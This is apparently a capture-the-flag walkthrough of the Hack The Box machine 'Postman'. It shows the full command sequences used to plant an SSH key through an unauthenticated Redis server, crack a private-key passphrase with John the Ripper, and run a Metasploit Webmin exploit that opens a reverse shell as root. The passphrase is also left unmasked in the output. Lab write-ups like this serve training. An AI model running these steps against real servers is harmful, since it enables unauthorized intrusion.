Postman
Always stay close to what keeps you feeling alive!
Postman is an easy difficulty machine running Linux. It tests your knowledge in OSINT, Redis exploitation and basic Privilege Escalation through a known exploit. There is nothing overly complicated about this machine as long as you stick to basic enumeration and don’t get too carried away.
Be sure to checkout the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan postman.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-02 06:11 PST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geeks Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesnt have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.36 secondsFrom the output we see that we have a website on port 80 as well as redis on port 6379 and webmin on port 10000.
Directory Bruteforce
Doing a scan with Gobuster using the dir mode reveals some files and directories:
gobuster dir -u http://postman.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html -o gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://postman.htb
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2019/12/02 06:16:32 Starting gobuster
===============================================================
/css (Status: 200)
/fonts (Status: 200)
/images (Status: 200)
/index.html (Status: 200)
/js (Status: 200)
/server-status (Status: 403)
/upload (Status: 200)
===============================================================
2019/12/02 06:22:02 Finished
===============================================================An interesting find is the upload directory!
Domains
Let’s checkout the website at http://postman.htb:
Nothing exciting. Let’s check the upload directory:
We find nothing useful and cannot find an upload form. Let’s move on for now.
Webmin
Checking exploitdb for anything useful we find the following vulnerability relating to our webmin version:
searchsploit webmin 1.910
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No ResultTaking a look at this exploit we see that it requires valid credentials.
Redis
Let’s do a quick test and see if we can access redis without credentials using the tool redis-cli:
redis-cli -h postman.htb -p 6379 set with_space 'boo'
OKLooks promising! We can connect with redis-cli -h postman.htb -p 6379 where we find that we can change various settings using the config set command.
Having redis installed on our local machine allows us to research how redis is installed and configured. We find that a user named redis is created and the home directory for this default user is /var/lib/redis. So far seems we can only write with save in /var/lib/redis so we will focus on that area.
User
After a quick web search we find a vulnerability with misconfigured redis servers which may allow us to login via SSH. If you remember from our nmap scan the ssh port 22 is open.
Let’s give this a try:
First we create an RSA key pair:
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:BHSzzWs/IESstXc+Zseq/OVFX9JdCu0oJNeKdSZkMrs root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o.* o |
| +o@ . . |
| o*.B = . .|
| .o.B.*.+ oo|
| E.*o..+ =|
| o += ooo|
| oo+. o|
| . .+ . |
| oo. . |
+----[SHA256]-----+Now let’s take our key and put it in a text file with new lines either side. I am assuming this is needed for when we parse it with redis:
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > ssh.txtWe will now flush the Redis datastore:
redis-cli -h postman.htb flushall
OKAnd write the ssh.txt file we created in to a keystore on the Redis server via redis-cli command:
cat ssh.txt | redis-cli -h postman.htb -x set ssh
OKNow we will connect to the redis-server and set the dir option to /var/lib/redis/.ssh and confirm that the options have been updated successfully:
redis-cli -h postman.htb
postman.htb:6379> config set dir /var/lib/redis/.ssh
OK
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"We then set the name of the file we want to save to the dir location and check that the options have been updated successfully:
postman.htb:6379> config set dbfilename "authorized_keys"
OK
postman.htb:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"Now for the moment of truth. Can we save our ssh key to the .ssh folder, let’s see:
postman.htb:6379> save
OKYes we can. The file was saved successfully.
Now to try logging in via ssh:
ssh -i ~/.ssh/id_rsa -l redis postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ The first thing we notice is that there is no user.txt in the redis users home directory. A quick look in /home shows the directory Matt which contains the user.txt flag:
redis@Postman:~$ ls -l /home/Matt/user.txt
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txtWe will need to get access to the Matt account.
Having a look around /var/lib/redis we can see there is the usual .bash_history file of which we have read access.
Viewing the contents we see commands that have been executed by Matt:
redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak We quickly notice the file id_rsa.bak. We are obviously going with an ssh theme here.
Let’s do a search for the file:
redis@Postman:~$ find / -name id_rsa.bak 2>&1 | grep -v "Permission denied"
/opt/id_rsa.bakNice. Let’s try and use it straight away and see if there is a passphrase:
redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak': Looks like Matt isn’t a complete idiot.
We will need to crack the key. John The Ripper will work well for this because we will need to convert the key to a readable format and john can do just that with ssh2john:
python ssh2john.py ~/Documents/postman/id_rsa.bak > ~/Documents/postman/id_rsa.hashIf you are using Kali you will find that ssh2john isn’t installed. You can download it from here.
Now let’s crack the hash:
john --wordlist=/root/Wordlists/passwords/passwords.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
com....08 (/root/Documents/postman/id_rsa.bak)
4g 0:00:02:44 DONE (2019-12-03 10:44) 0.02431g/s 1841Kp/s 1841Kc/s 1841KC/s 233091..hielox
Session completedOk I take back what I said. Matt’s an idiot! Now let’s try and login via ssh locally from the redis shell:
redis@Postman:~$ ssh -i /opt/id_rsa.bak -l Matt localhost
Enter passphrase for key '/opt/id_rsa.bak':
Connection closed by ::1 port 22Look’s like we have an issue. The passphrase worked but Matt may not be allowed to ssh in. This reminds me that there was a command in .bash_history where Matt was messing around with /etc/ssh/sshd_config the configuration file for the ssh server. Taking a look we can see Matt has logging in via ssh disabled:
redis@Postman:~$ cat /etc/ssh/sshd_config | grep DenyUsers
DenyUsers MattLet’s try the password with su instead:
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ We can now grab the user flag in Matt’s home directory:
Matt@Postman:~$ cat user.txt
517ad0ec24....aac08a2f3cOn to root!
Root
Let’s go checkout the webmin exploit we saw earlier that required valid credentials may be the way to go.
One of those was Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) which is a Metasploit module:
msf5 > search type:exploit name:webmin package
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD com....08
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost <attacker-ip>
lhost => 10.10.14.40
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts postman.htb
rhosts => postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.40:4444
[+] Session cookie: 501c01341b72936a3e2c8cc9db790a16
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.40:4444 -> 10.10.10.160:36478) at 2019-12-03 11:02:32 -0800
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a257741c....5686ddceAnd we are done :)
Conclusion
This machine was straight forward with sufficient research to establish how things work. Misconfigured Redis servers have been a real issue in the past and can still be found today in the wild. Overall this was an enjoyable machine.
